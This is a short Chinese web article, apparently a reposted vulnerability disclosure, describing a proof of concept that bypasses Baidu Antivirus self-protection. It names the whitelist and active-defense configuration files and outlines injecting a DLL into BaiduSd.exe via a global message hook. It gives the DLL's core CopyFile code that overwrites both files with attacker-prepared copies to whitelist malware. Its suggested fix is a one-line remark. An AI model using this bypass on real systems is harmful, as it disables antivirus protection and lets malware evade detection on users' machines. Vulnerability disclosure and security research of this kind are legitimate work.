应用层所有方面绕过百度杀毒任意执行代码及修好方案(poc)
发表时间:2022-07-01 来源:学卫网整理相关软件相关文章人气:
百度杀毒是百度公司全新出品的专业杀毒软件,集合了百度强大的云端计算、海量数据学习能力与百度自主研发的反病毒引擎专业能力,一改杀毒软件卡机臃肿的形象,竭力为用户提供轻巧不卡机的产品体验。
测试版本:百度杀毒1.2.0.1020 测试系统环境:winxp sp3 和腾讯一样的,只是百度2个文件都保护了. //这个文件是杀毒白名单,免杀就往这加 C:\Documents and Settings\All Users\Application Data\baidu\baidusd\white_list.db //这个是主动防御 C:\Documents and Settings\All Users\Application Data\baidu\baidusd\Config\900.dat 虽然都保护了但有个地方百度疏忽了,见POC 1.先本地构造好white_list.db和900.dat放到C盘 2.编写一个简单的全局消息注入程序,将test.dll注入到BaiduSd.exe绕过保护修改文件 以下为test.dll核心代码
CopyFile(_T("C:\\white_list.db"),_T("C:\\Documents and Settings\\All Users\\Application Data\\baidu\\baidusd\\white_list.db"),FALSE);CopyFile(_T("C:\\900.dat"),_T("C:\\Documents and Settings\\All Users\\Application Data\\baidu\\baidusd\\Config\\900.dat"),FALSE);
修复方案:校验啊校验
就爱阅读www.92to.com网友整理上传,为您提供最全的知识大全,期待您的分享,转载请注明出处。
百度杀毒,搭载百度自研双引擎——雪狼引擎、慧眼引擎,采用百度独有的“深度学习”技术,具有超大规模训练集、高木马检出率、极低误报、体积小等特点。
软件下载: